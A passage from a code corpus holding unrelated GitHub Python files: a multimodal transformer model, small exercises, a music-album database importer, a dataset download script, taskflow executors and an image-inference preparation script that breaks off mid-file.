self.multi_embeddings = \\\n transformer_embeddings(transformer_cfg, True)\n # Sharing across modalities\n if cfg.TRANSFORMER.SHARING_ACROSS_MODELS:\n self.transformer = transformer_model(transformer_cfg)\n for i in 
range(self.num_modalities):\n setattr(\n self,\n f\"single_{self.idx2modality[i]}_transformer\",\n self.transformer\n )\n self.multi_transformer = self.transformer\n else:\n for i in range(self.num_modalities):\n self.add_module(\n f\"single_{self.idx2modality[i]}_transformer\",\n transformer_model(transformer_cfg)\n )\n self.multi_transformer = \\\n transformer_model(transformer_cfg)\n elif cfg.MODEL.FUSION == 'late':\n transformer_cfg.num_modality_groups = self.num_modalities\n for i in range(self.num_modalities):\n self.add_module(\n f\"single_{self.idx2modality[i]}_embeddings\",\n transformer_embeddings(transformer_cfg, False)\n )\n # Sharing across modalities\n if cfg.TRANSFORMER.SHARING_ACROSS_MODELS:\n self.transformer = transformer_model(transformer_cfg)\n for i in range(self.num_modalities):\n setattr(\n self,\n f\"single_{self.idx2modality[i]}_transformer\",\n self.transformer\n )\n else:\n for i in range(self.num_modalities):\n self.add_module(\n f\"single_{self.idx2modality[i]}_transformer\",\n transformer_model(transformer_cfg)\n )\n self.multi_embeddings = None\n self.multi_transformer = None\n else:\n raise NotImplementedError(\n \"Does not support {} fusion\".format(cfg.MODEL.FUSION)\n )\n\n def forward(\n self,\n visual_seq=None,\n audio_seq=None,\n ):\n batch_size, seqlen = \\\n visual_seq[0].size()[:2] if visual_seq is not None else \\\n audio_seq.size()[:2]\n\n # ConvNet\n conv_outputs = []\n _conv_outputs = []\n idx2modality = []\n if 'visual' in self.cfg.MODEL.ARCH and visual_seq is not None:\n nchannels, _, H, W = visual_seq[0].size()[2:]\n vconv_repr = self.visual_conv.get_feature_map(\n [\n t.view(\n batch_size * seqlen,\n nchannels,\n -1,\n H,\n W,\n )\n for t in visual_seq\n ]\n )\n conv_outputs.append(vconv_repr)\n _conv_outputs.append(\n self.visual_conv.get_logit(vconv_repr).view(batch_size, seqlen, -1)\n )\n idx2modality.append('visual')\n if 'audio' in self.cfg.MODEL.ARCH and audio_seq is not None:\n nchannels, frequency, time = audio_seq.size()[2:]\n aconv_repr = self.audio_conv.get_feature_map(\n audio_seq.view(\n batch_size * seqlen,\n nchannels,\n frequency,\n time,\n )\n )\n conv_outputs.append(aconv_repr)\n _conv_outputs.append(\n self.audio_conv.get_logit(aconv_repr).view(batch_size, seqlen, -1)\n )\n idx2modality.append('audio')\n # assert len({len(_conv_outputs), self.num_modalities}) == 1\n modality2idx = {value: idx for idx, value in enumerate(idx2modality)}\n num_modalities = len(idx2modality)\n\n # Transformers\n # Single modality\n # Projection and normalization\n # Prepend summary embeddings\n single_inputs = []\n for idx in range(num_modalities):\n fc = getattr(self, f\"{idx2modality[idx]}_fc\")\n norm = getattr(self, f\"{idx2modality[idx]}_norm\")\n conv_repr_prj = norm(fc(_conv_outputs[idx]))\n _idx = self.modality2idx[idx2modality[idx]]\n single_inputs.append(\n self.summary_encoding(conv_repr_prj, _idx)\n )\n\n att_mask = torch.ones(\n batch_size, 1 + seqlen,\n dtype=torch.long,\n device=_conv_outputs[0].device,\n )\n\n single_outputs = []\n for idx in range(num_modalities):\n s_embeddings = getattr(\n self,\n f\"single_{idx2modality[idx]}_embeddings\"\n )\n s_transformer = getattr(\n self,\n f\"single_{idx2modality[idx]}_transformer\"\n )\n _idx = self.modality2idx[idx2modality[idx]]\n single_output = s_transformer(\n s_embeddings(single_inputs[idx]),\n attention_mask=att_mask,\n modality_idx=_idx\n )[0]\n single_outputs.append(single_output)\n\n\n # Multi modality\n multi_output = None\n if self.multi_transformer is not None and 
num_modalities == 2:\n multi_input = torch.cat(single_outputs, dim=1)\n token_type_ids = torch.cat(\n [\n torch.zeros(\n batch_size,\n 1 + seqlen,\n dtype=torch.long,\n device=multi_input.device\n ),\n torch.ones(\n batch_size,\n 1 + seqlen,\n dtype=torch.long,\n device=multi_input.device\n )\n ],\n dim=1\n )\n input_shape = multi_input.size()[:-1]\n position_ids = torch.cat(\n [\n torch.arange(\n 1 + seqlen,\n dtype=torch.long,\n device=multi_input.device\n ),\n torch.arange(\n 1 + seqlen,\n dtype=torch.long,\n device=multi_input.device\n )\n ]\n )\n position_ids = position_ids.unsqueeze(0).expand(input_shape)\n\n multi_attention_mask = torch.cat(\n [att_mask, att_mask],\n dim=1,\n )\n\n multi_output = self.multi_transformer(\n self.multi_embeddings(\n multi_input,\n token_type_ids=token_type_ids,\n position_ids=position_ids\n ),\n attention_mask=multi_attention_mask,\n modality_idx=self.num_modalities,\n )[0]\n\n return conv_outputs, single_outputs, multi_output\n","repo_name":"sangho-vision/avbert","sub_path":"code/models/avbert.py","file_name":"avbert.py","file_ext":"py","file_size_in_byte":10829,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"13916651323","text":"from questions.question03 import encrypt_message\n\n\ndef test_is_message_equals(capfd):\n \"\"\"\n checks if the output format received by function encrypt_message() will be the same\n as expected given the expected variable\n \"\"\"\n encrypt_message('tenha um bom dia')\n out, err = capfd.readouterr()\n assert out == 'taoa eum nmd hbi '\n","repo_name":"rousuy/Desafio_Programacao_Capgemini02","sub_path":"source/tests/test_question03.py","file_name":"test_question03.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23595349268","text":"#!/usr/bin/env python\n\"\"\" Generators for lesson 1 \"\"\"\n\n\ndef intsum():\n \"\"\" yeild the sum of the current and the next number \"\"\"\n total = 0\n next_number = 0\n while True:\n yield total\n next_number += 1\n total += next_number\n\ndef intsum2():\n \"\"\" I think I'm missing something here. I am pretty certain that I was not supposed to create this just to pass the tests.\n yield the sum of the current and the next number\n \"\"\"\n total = 0\n next_number = 0\n while True:\n yield total\n next_number += 1\n total += next_number\n\ndef doubler():\n \"\"\" doubler \"\"\"\n current = 1\n while True:\n yield current\n current *= 2\n\n\ndef fib():\n \"\"\" Fibonacci sequence \"\"\"\n a, b = 1, 1\n while True:\n yield a\n a, b = b, a + b\n\n\ndef prime():\n \"\"\"\n yield prime numbers\n Generate an infinite sequence of prime numbers.\n \"\"\"\n # I found this on stack overflow and really liked how clean it was.\n # Maps composites to primes witnessing their compositeness.\n # This is memory efficient, as the sieve is not \"run forward\"\n # indefinitely, but only as long as required by the current\n # number being tested.\n D = {}\n # The running integer that's checked for primeness\n q = 2\n\n while True:\n if q not in D:\n # q is a new prime.\n # Yield it and mark its first multiple that isn't\n # already marked in previous iterations\n #\n yield q\n D[q * q] = [q]\n else:\n # q is composite. D[q] is the list of primes that\n # divide it. 
Since we've reached q, we no longer\n # need it in the map, but we'll mark the next\n # multiples of its witnesses to prepare for larger\n # numbers\n #\n for p in D[q]:\n D.setdefault(p + q, []).append(p)\n del D[q]\n q += 1\n\n\n\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/kenneth_murray/Lesson1/Generator/generator_solution.py","file_name":"generator_solution.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3834480217","text":"# USAGE:\n# python3 store_album.py relative/path/to/file.json\n# TODO: add aggressive validation everywhere to make sure bad data never makes\n# its way into the database\n\nimport psycopg2\nimport json\nimport sys\nfrom datetime import datetime\n\n\ndef parse_data_from_file():\n \"\"\"\n Parse JSON from file specified in CLI into dictionary\n\n Returns:\n dict -- album data\n \"\"\"\n # get filename from CLI\n filename = sys.argv[1]\n\n # load JSON from file\n with open(filename) as data_file:\n data = json.load(data_file)\n\n return data\n\n\ndef construct_date_tuple(fuzzy_date):\n \"\"\"\n Construct valid YYYY-MM-DD date string, as well as accuracy string\n from fuzzy date string.\n\n Why? So that we can still use the \"DATE\" type in the database, but\n preserving the disctinction between 2016-01-01 where we actually only\n know the year (2017), as compared to 2017-01-01 where we actually know\n that is is exactly January 1, 2017.\n\n Arguments:\n fuzzy_date {string} -- date in the following possible formats:\n YYYY-MM-DD, YYYY-MM, YYYY\n\n Returns:\n date + accuracy {tuple(str, str)} -- eg. ('2015-04-28', 'exact date')\n first element is a date string in YYYY-MM-DD format\n second element is a string of the these possible values:\n \"exact date\" - year, month, and day are all exact\n \"month\" - only year and month are accurate\n \"year\" - only year is accurate\n \"\"\"\n for char in fuzzy_date:\n assert(char == '-' or char.isdigit())\n\n components = fuzzy_date.split('-')\n\n if len(components) == 3:\n return (fuzzy_date, 'exact date')\n\n elif len(components) == 2:\n return (\n datetime.strptime(fuzzy_date, '%Y-%m').strftime('%Y-%m-%d'),\n 'month'\n )\n\n else:\n return (\n datetime.strptime(fuzzy_date, '%Y').strftime('%Y-%m-%d'),\n 'year'\n )\n\n\ndef is_album_new(data, cursor):\n \"\"\"\n Determine if the album is already in the database\n\n Unique identifiers for an album:\n label name + catalog\n label name + album title + release_date (if catalog is missing)\n label name + album title (if catalog AND release_date are both missing)\n\n 'Label' is required.\n\n Args:\n data: dictionary of JSON data\n cursor: database cursor, coming from psycopg2\n\n Returns:\n boolean - True if album is new, False if album is already in DB\n \"\"\"\n # uniquely identify an album by label name + catalog\n if 'catalog' in data['album']:\n cursor.execute(\"\"\"\n SELECT a_l.id FROM albums_labels a_l\n JOIN label label\n ON label.id = a_l.fk_label_id\n WHERE label.name = %s\n AND a_l.catalog = %s\n \"\"\", (data['album']['label'], data['album']['catalog']))\n\n # uniquely identify an album by\n # label name + album title + release_date (if catalog is missing)\n elif 'release_date' in data['album']:\n release_date, release_date_accuracy = construct_date_tuple(\n data['album']['release_date'])\n\n cursor.execute(\"\"\"\n SELECT a_l.id FROM albums_labels a_l\n JOIN label label\n ON label.id = a_l.fk_label_id\n JOIN album album\n ON 
album.id = a_l.fk_album_id\n            WHERE label.name = %s\n            AND album.title = %s\n            AND release_date = %s\n            AND release_date_accuracy = %s\n        \"\"\", (\n            data['album']['label'],\n            data['album']['title'],\n            release_date,\n            release_date_accuracy\n        ))\n\n    # uniquely identify an album by\n    # label name + album title (if catalog AND release_date are both missing)\n    else:\n        cursor.execute(\"\"\"\n            SELECT a_l.id FROM albums_labels a_l\n            JOIN label label\n                ON label.id = a_l.fk_label_id\n            JOIN album album\n                ON album.id = a_l.fk_album_id\n            WHERE label.name = %s\n            AND album.title = %s\n        \"\"\", (\n            data['album']['label'],\n            data['album']['title']\n        ))\n\n    return not bool(cursor.fetchone())\n\n\ndef process_album(data, cursor):\n    label_id = add_label_and_get_id(data, cursor)\n    album_id = add_album_and_get_id(data, label_id, cursor)\n    add_discs(data, album_id, cursor)\n\n    persons_subm_to_db_id_map = add_persons(data, cursor)\n    add_compositions(data, persons_subm_to_db_id_map, cursor)\n\n    # add_recordings(data, cursor)\n    # add_tracks(data, cursor)\n\n\ndef add_label_and_get_id(data, cursor):\n    \"\"\"if label already exists, get label id, otherwise insert and get label id\n    \"\"\"\n    cursor.execute(\"SELECT id FROM label WHERE name = %s\",\n                   (data['album']['label'],))\n    try:\n        label_id = cursor.fetchone()[0]\n    except TypeError:\n        cursor.execute(\"INSERT INTO label (name) VALUES (%s) RETURNING id\",\n                       (data['album']['label'],))\n        label_id = cursor.fetchone()[0]\n    return label_id\n\n\ndef add_album_and_get_id(data, label_id, cursor):\n    \"\"\"adds a new album, and returns its ID\"\"\"\n\n    # Construct optional release_date and release_date_accuracy values\n    date = None\n    accuracy = None\n    if 'release_date' in data['album']:\n        date, accuracy = construct_date_tuple(data['album']['release_date'])\n    cursor.execute(\"\"\"\n        INSERT INTO album (title, release_date, release_date_accuracy,\n            total_discs, media) VALUES (%s, %s, %s, %s, %s)\n        RETURNING id\n    \"\"\", (\n        data['album']['title'],\n        date,\n        accuracy,\n        data['album']['total_discs'],\n        data['album']['media']\n    ))\n    album_id = cursor.fetchone()[0]\n    cursor.execute(\"\"\"\n        INSERT INTO albums_labels (fk_album_id, fk_label_id, catalog)\n        VALUES (%s, %s, %s)\n    \"\"\", (album_id, label_id, data['album'].get('catalog')))\n    return album_id\n\n\ndef add_discs(data, album_id, cursor):\n    \"\"\"add discs to DB\"\"\"\n    total_discs = data['album']['total_discs']\n    discs = data['discs']\n    for disc_num in range(1, total_discs+1):\n        total_tracks = discs[str(disc_num)]['total_tracks']\n        cursor.execute(\"\"\"\n            INSERT INTO disc (fk_album_id, disc_num, total_tracks)\n            VALUES (%s, %s, %s)\n        \"\"\", (album_id, disc_num, total_tracks))\n\n\ndef add_persons(data, cursor):\n    \"\"\" Add persons to database \"\"\"\n    persons_subm_to_db_id_map = {}\n    persons = data.get('persons')\n    for subm_id, person in persons.items():\n        persons_subm_to_db_id_map[subm_id] = add_person(person, cursor)\n    return persons_subm_to_db_id_map\n\n\ndef add_person(person, cursor):\n    \"\"\" get person id, and if not already in DB, add person to the DB\n    \"\"\"\n    cursor.execute(\"\"\"\n        SELECT id FROM person\n        WHERE name_last = %s\n        AND name_first_plus = %s\n        AND group_name = %s\n    \"\"\", (\n        person.get('name_last'),\n        person.get('name_first_plus'),\n        person.get('group_name'))\n    )\n\n    try:\n        person_id = cursor.fetchone()[0]\n    except TypeError:\n        cursor.execute(\"\"\"\n            INSERT INTO person (name_last, name_first_plus, group_name)\n            VALUES (%s, %s, %s)\n            RETURNING id\n        \"\"\", (\n            
person.get('name_last'),\n            person.get('name_first_plus'),\n            person.get('group_name')\n        ))\n        person_id = cursor.fetchone()[0]\n    return person_id\n\n\ndef add_compositions(data, persons_subm_to_db_id_map, cursor):\n    \"\"\" Add compositions to database \"\"\"\n    compositions = data.get('compositions')\n    for key, composition in compositions.items():\n        add_composition(data, composition, persons_subm_to_db_id_map, cursor)\n\n\ndef add_composition(data, composition, persons_subm_to_db_id_map, cursor):\n    \"\"\" Add composition to database\n    #\n    # Unhandled cases (for now, at least):\n    # - Anything that doesn't have enough data to be matched using above\n    #   uniqueness definitions, such as:\n    #   - Anonymous Composers\n    #   - No Title\n    #   - Atonal music that is unpublished without catalog number\n    #   - Derivative works of any kind (where person is not \"Composer\")\n    \"\"\"\n    title = composition.get('title')\n    movements = composition.get('movements')\n    total_movements = len(movements) if movements else 1\n\n    # Get composer_db_id\n    # TODO: abstract into separate method\n    # TODO: support more than just \"composer\" person related to composition,\n    # should also support 'arranger', 'transcriber', etc... (other valid\n    # \"composer-like\" roles)\n    persons = composition.get('persons')\n    composer_submission_id = next(\n        (p['submission_id'] for p in persons if p['type'] == 'composer'), None)\n    composer_db_id = persons_subm_to_db_id_map.get(composer_submission_id)\n\n    catalogs = composition.get('catalogs')\n    if catalogs:\n        first_catalog = catalogs[0]\n        catalog_type = first_catalog.get('catalog_type')\n        catalog_num = first_catalog.get('catalog_num')\n        catalog_sub_num = first_catalog.get('catalog_sub_num')\n\n        # Unique Identifier of a Composition\n        # Version 1 - Composition with Catalog Info\n        #   Composition Persons (i.e. Composer(s), Arranger(s), etc.)\n        #   Title\n        #   Total # of Movements\n        #   Catalog (just the first one is enough)\n        cursor.execute(\"\"\"\n            SELECT composition.id FROM composition\n            JOIN compositions_persons\n                ON composition.id = compositions_persons.fk_composition_id\n            JOIN person\n                ON person.id = compositions_persons.fk_person_id\n            JOIN person_role\n                ON person_role.id = compositions_persons.fk_person_role_id\n            JOIN catalog\n                ON composition.id = catalog.fk_composition_id\n            WHERE person_role.type = 'composer'\n            AND person.id = %s\n            AND composition.title = %s\n            AND composition.total_mvmts = %s\n            AND catalog.catalog_type = %s\n            AND catalog.catalog_num = %s\n            AND catalog.catalog_sub_num = %s\n        \"\"\", (\n            composer_db_id,\n            title,\n            total_movements,\n            catalog_type,\n            catalog_num,\n            catalog_sub_num)\n        )\n        row = cursor.fetchone()\n        composition_id = row[0] if row else None\n\n    else:\n        # Unique Identifier of a Composition\n        # Version 2 - Composition Lacking Catalog Info\n        #   Composition Persons (i.e. 
Composer(s), Arranger(s), etc.)\n        #   Title\n        #   Total # of Movements\n        #   Key (or mode)\n        #\n        #   Date of Composition (if date range, choose earliest date)\n        #   AND / OR\n        #   First Publication Date (if date range, choose earliest date)\n        pass\n\n    # If no composition is found, insert all the data and return the\n    # composition_id\n    #\n    # insert composition table row, returning composition_id\n    # for person in persons:\n    #     add_composition_person(data, person, composition_id)\n\n    # for catalog in catalogs:\n    #     add_catalog(catalog, composition_id)\n\n    # for movement in movements:\n    #     add_movement(movement, composition_id)\n\n\ndef add_catalog(data, cursor):\n    pass\n\n\ndef add_movements(data, cursor):\n    pass\n\n\ndef add_recordings(data, cursor):\n    pass\n\n\ndef add_tracks(data, cursor):\n    pass\n\n\ndef main():\n    # open connection and fetch cursor to database\n    connection = psycopg2.connect('dbname=classicast user=postgres')\n    cursor = connection.cursor()\n\n    data = parse_data_from_file()\n\n    try:\n        if is_album_new(data, cursor):\n            process_album(data, cursor)\n\n            # Make the changes to the database persistent\n            connection.commit()\n        else:\n            print('This album already exists in the system!' +\n                  ' Please edit the existing data.')\n    except Exception as exception_instance:\n        # rollback any changes if error is encountered in the process of adding\n        # album information to the database\n        connection.rollback()\n        raise exception_instance\n    finally:\n        # Close communication with the database\n        cursor.close()\n        connection.close()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"classicast/masseur","sub_path":"store_album.py","file_name":"store_album.py","file_ext":"py","file_size_in_byte":12430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"44461980707","text":"from typing import List\nfrom functools import reduce\ndef productExceptSelf(nums: List[int]) -> List[int]:\n    out = []\n    p = 1\n    for i in range(0, len(nums)):\n        out.append(p)\n        p = p*nums[i]\n    p = 1\n    for i in range(len(nums)-1, 0-1, -1):\n        out[i] = out[i] * p\n        p = p * nums[i]\n    return out\n\nif __name__ == \"__main__\":\n    nums = [1,2,3,4]\n    print(productExceptSelf(nums))","repo_name":"joohyun333/programmers","sub_path":"LeetCode/product-of-array-except-self.py","file_name":"product-of-array-except-self.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"30351104041","text":"\nname = '郑爽'\n\ndef fn():\n    print('-- fn --')\n\n\n# print(globals())\nprint('__name__: ', __name__)\n\n# 1. Serves as the entry point when the file is run directly\n# 2. Used as the module's own internal test code\n# a. If this file is run directly, the if branch runs and __name__ == '__main__'\n# b. If another module imports this one, the if branch is skipped and __name__ == 'module' (the module name)\n\n\nif __name__ == '__main__':\n    fn()\n","repo_name":"fufuzzz/note","sub_path":"Python基础/第03周/day12/code/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"72434204266","text":"n, k = [int(i) for i in input().split(' ')]\n\na = [0]*n\nl, r = 0, 0\ntmp = 0\n\nfor i in range(n):\n    a[i] = float(input())*100\n    tmp += a[i]\nr = tmp//k+1\n\n\nwhile r-l > 1e-4:\n    mid = (l+r)/2\n\n    tmp = 0\n    for i in range(n):\n        tmp = tmp + a[i]//mid\n    if tmp < k:\n        r = mid\n    else:\n        l = mid\n\n\nt = 
int(r*1.00)/100\nprint(t)\n\n\n","repo_name":"jellier/HetaoHomeWork","sub_path":"算法练习/P1577_二分_切绳子.py","file_name":"P1577_二分_切绳子.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16588994169","text":"import sys\n\nimport optparse\nimport os\nimport logging\n\nfrom utils import download_and_extract_archive, download_file\n\n# Append parent dir to sys path.\nparent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nos.sys.path.insert(0, parent_dir)\n\nTREEBANK_CONLL = 'https://lindat.mff.cuni.cz/repository/xmlui/bitstream/handle/11234/1-2515/ud-treebanks-v2.1.tgz?sequence=4&isAllowed=y'\nTREEBANK_LOCATION = 'corpus/ud_treebanks'\n\nTEST_DATA_CONLL = 'https://lindat.mff.cuni.cz/repository/xmlui/bitstream/handle/11234/1-2184/ud-test-v2.0-conll2017.tgz?sequence=3&isAllowed=y'\nTEST_DATA_LOCATION = 'corpus/ud_test'\n\nUD_EVAL_SCRIPT = 'https://raw.githubusercontent.com/ufal/conll2017/master/evaluation_script/conll17_ud_eval.py'\nUD_EVAL_LOCATION = 'cube/misc/conll17_ud_eval.py'\n\nEMBEDDINGS_NAME = 'wiki.{}.vec'\nFACEBOOK_EMBEDDINGS_URL = 'https://s3-us-west-1.amazonaws.com/fasttext-vectors/'\nFACEBOOK_EMBEDDINGS_LOCATION = 'corpus/'\n\nlogger = logging.getLogger(__name__)\n\n\nif __name__ == '__main__':\n parser = optparse.OptionParser()\n parser.add_option('--language', action='store', dest='language')\n (params, _) = parser.parse_args(sys.argv)\n if not params.language:\n print(\n '\\nRun the script in the following manner:\\n'\n 'python scripts/download_data.py --language ro\\n')\n sys.exit(1)\n\n # Download Treebank CONLL Universal Dependencies data.\n download_and_extract_archive(TREEBANK_CONLL, TREEBANK_LOCATION)\n\n # Download test CONLL Universal Dependencies data.\n download_and_extract_archive(TEST_DATA_CONLL, TEST_DATA_LOCATION)\n\n # Download conll17_ud_eval script\n download_file(UD_EVAL_SCRIPT, UD_EVAL_LOCATION)\n\n # Download Facebook embeddings for the provided language.\n name = EMBEDDINGS_NAME.format(params.language)\n language_url = FACEBOOK_EMBEDDINGS_URL + name\n location = FACEBOOK_EMBEDDINGS_LOCATION + name\n download_file(language_url, location)\n","repo_name":"Sreeganesh/POS_Tagging_and_Dependency_Parsing","sub_path":"scripts/download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43259464467","text":"def getShipCells(ship):\n res = []\n startCell, endCell = ship\n x1, y1 = startCell\n x2, y2 = endCell\n if x1 == x2:\n biggerY, smallerY = [y1, y2] if y1 > y2 else [y2, y1]\n for y in range(smallerY, biggerY + 1):\n res.append([x1, y])\n else:\n biggerX, smallerX = [x1, x2] if x1 > x2 else [x2, x1]\n for x in range(smallerX, biggerX + 1):\n res.append([x, y1])\n return res\n\n\ndef checkBattleGround(ships):\n allShipWithAllCells = list(map(getShipCells, ships))\n allShipsOnBattle = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0}\n for index, mainShip in enumerate(allShipWithAllCells):\n if len(mainShip) not in allShipsOnBattle.keys():\n return False\n allShipsOnBattle[len(mainShip)] += 1\n for checkShip in allShipWithAllCells[:index] + allShipWithAllCells[index+1:]:\n for cellInMainShip in mainShip:\n for cellInCheckShip in checkShip:\n x1, y1 = cellInMainShip\n x2, y2 = cellInCheckShip\n if x1 == x2 and y1 == y2:\n return False\n if x1 - 1 <= x2 <= x1 + 1 and y1-1 <= y2 <= y1+1:\n return False\n if allShipsOnBattle[1] != 4 or 
allShipsOnBattle[2] != 3 or allShipsOnBattle[3] != 2 or allShipsOnBattle[4] != 1 or allShipsOnBattle[5] != 1:\n        return False\n    return True\n\n\nprint(checkBattleGround([\n    [[1, 1], [1, 1]],\n    [[1, 3], [1, 3]],\n    [[1, 5], [1, 5]],\n    [[1, 7], [1, 7]],\n    [[1, 10], [2, 10]],\n    [[4, 10], [5, 10]],\n    [[7, 10], [8, 10]],\n    [[10, 10], [10, 8]],\n    [[10, 6], [10, 4]],\n    [[10, 1], [7, 1]],\n    [[3, 3], [3, 7]]\n    # [[1, 3], [1, 7]] # False\n]))\n","repo_name":"ahd3r/algo","sub_path":"validate_battle_ship.py","file_name":"validate_battle_ship.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"14596390209","text":"import functools\nimport time\nimport eventlet\n\nfrom simpleutil.utils import jsonutils\nfrom simpleutil.utils import importutils\nfrom simpleutil.utils import reflection\n\nfrom simpleflow.task import FunctorTask\n\nfrom goperation.taskflow import common\nfrom goperation.manager import common as manager_common\n\nfrom goperation.manager.rpc.agent.scheduler.taskflow import SchedulerTaskBase\n\nfrom goperation.manager.api import get_http\n\n\ndef safe_load(var):\n    if var is None:\n        return None\n    return jsonutils.loads_as_bytes(var)\n\n\nclass HttpRequestExecutor(SchedulerTaskBase, FunctorTask):\n\n    ECLS = object\n    RCLS = object\n\n    @classmethod\n    def builder(cls, name, jobstep, **kwargs):\n        ecls = importutils.import_class(jobstep.execute)(get_http())\n        method = jobstep.method\n        execute = getattr(ecls, method)\n        provides = safe_load(jobstep.provides)\n        rebind = safe_load(jobstep.rebind)\n        revert = None\n        if jobstep.revert:\n            revert = importutils.import_class(jobstep.revert)(ecls, method)\n        return cls(name, jobstep, execute, provides, rebind, revert, **kwargs)\n\n    def __init__(self, name, jobstep, execute, provides, rebind, revert=None):\n        self.jobstep = jobstep\n        super(HttpRequestExecutor, self).__init__(name=name,\n                                                  execute=execute,\n                                                  rebind=rebind, provides=provides)\n        self._revert = revert\n\n    def revert(self, result, *args, **kwargs):\n        if self._revert:\n            self._revert(result)\n            self.jobstep.result = common.REVERTED\n            self.jobstep.resultcode = manager_common.RESULT_UNKNOWN\n\n\nclass AsyncHttpRequestExecutor(HttpRequestExecutor):\n\n    def __init__(self, name, jobstep, execute, provides, rebind, revert=None,\n                 agents=True, details=False):\n        self.jobstep = jobstep\n        super(AsyncHttpRequestExecutor, self).__init__(name, jobstep, execute, provides, rebind, revert)\n        self.agents = agents\n        self.details = details\n\n    def execute(self, *args, **kwargs):\n        asyncresult = super(AsyncHttpRequestExecutor, self).execute(*args, **kwargs)['data'][0]\n        finishtime = asyncresult['finishtime']\n        deadline = asyncresult['deadline'] + 1\n        request_id = asyncresult['request_id']\n        # functools.partial takes the callable as its first positional argument\n        request = functools.partial(getattr(reflection.get_method_self(self._execute), 'async_show'),\n                                    request_id=request_id,\n                                    body={'agents': self.agents, 'details': self.details})\n        wait = finishtime - int(time.time())\n        if wait < 0:\n            wait = 0\n        eventlet.sleep(wait)\n        not_overtime = 2\n        while True:\n            asyncresult = request()['data'][0]\n            if asyncresult['status'] == manager_common.FINISH:\n                return asyncresult\n            if int(time.time()) > deadline:\n                not_overtime -= 1\n                if not not_overtime:\n                    raise RuntimeError('async request %s did not finish before deadline' % request_id)\n            eventlet.sleep(1)\n\n\nclass RpcCastRequestExecutor(SchedulerTaskBase, FunctorTask):\n    pass\n\n\nclass RpcCallRequestExecutor(RpcCastRequestExecutor):\n    
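# Placeholder: call-style requests currently inherit the empty cast implementation\n    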
pass\n","repo_name":"lolizeppelin/Goperation","sub_path":"goperation/manager/rpc/agent/scheduler/taskflow/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"13231336096","text":"# bfs 풀이\nfrom collections import deque\n\nn, m = map(int, input().split())\n\ngraph = []\nfor _ in range(n):\n graph.append(input())\n\nvisited = [[False]*m for i in range(n)]\n\nanswer = 0\nfor i in range(n):\n for j in range(m):\n if graph[i][j] == '0' and not visited[i][j]:\n queue = deque()\n queue.append((i, j))\n visited[i][j] = True\n while queue:\n curr = queue.popleft()\n dir = [(1, 0), (-1, 0), (0, 1), (0, -1)] \n for d in dir:\n r = curr[0] + d[0]\n c = curr[1] + d[1]\n if r>=0 and r= 0 and rf[raw_ds].max() <= 1\n ), \"Raw values are float but not in [0,1], I don't know how to normalize. Please provide a factor.\"\n factor = 1.0\n else:\n raise ValueError(\n \"don't know which factor to assume for data of type {0:}\".format(\n rf[raw_ds].dtype\n )\n )\n\n if min_sc is None or max_sc is None:\n try:\n if min_sc is None:\n min_sc = rf[raw_ds].attrs[\"contrastAdjustment\"][\"min\"]\n if max_sc is None:\n max_sc = rf[raw_ds].attrs[\"contrastAdjustment\"][\"max\"]\n except KeyError:\n min_sc = 0.0\n max_sc = factor\n logging.warning(\n \"min_sc and max_sc not specified and contrastAdjustment not found in attributes of {0:}, will continue \"\n \"with default contrast (min {1:}, max{2:}\".format(\n os.path.join(rf, raw_ds), min_sc, max_sc\n )\n )\n\n scale = (factor / (float(max_sc) - float(min_sc))) * 2.0\n shift = -scale * (float(min_sc) / factor) - 1\n\n return factor, scale, shift\n\n\ndef prepare_cell_inference(\n n_jobs,\n raw_data_path,\n dataset_id,\n sigma,\n raw_ds,\n setup_path,\n output_path,\n factor,\n min_sc,\n max_sc,\n float_range,\n safe_scale,\n n_cpus,\n finish_interrupted,\n):\n # assert os.path.exists(setup_path), \"Path to experiment directory does not exist\"\n # sys.path.append(setup_path)\n # import unet_template\n if raw_data_path.endswith(\"/\"):\n raw_data_path = raw_data_path[:-1]\n assert os.path.exists(\n raw_data_path\n ), \"Path to N5 dataset with raw data and mask does not exist\"\n # assert os.path.exists(os.path.join(setup_path, \"blur.meta\"))\n rf = zarr.open(raw_data_path, mode=\"r\")\n assert raw_ds in rf, \"Raw data not present in N5 dataset\"\n shape_vc = rf[raw_ds].shape\n\n output_dir, out_file = get_output_paths(raw_data_path, setup_path, output_path)\n\n if not finish_interrupted:\n names = blur_tf(size, sigma)\n input_shape_vc = Coordinate(size)\n\n output_shape_wc = Coordinate(size) * voxel_size\n output_shape_vc = Coordinate(size)\n chunk_shape_vc = Coordinate(size)\n chunk_shape_wc = output_shape_wc\n\n full_shape_wc = Coordinate(shape_vc) * voxel_size\n full_shape_vc_output = Coordinate(shape_vc)\n\n # offset file, e.g. 
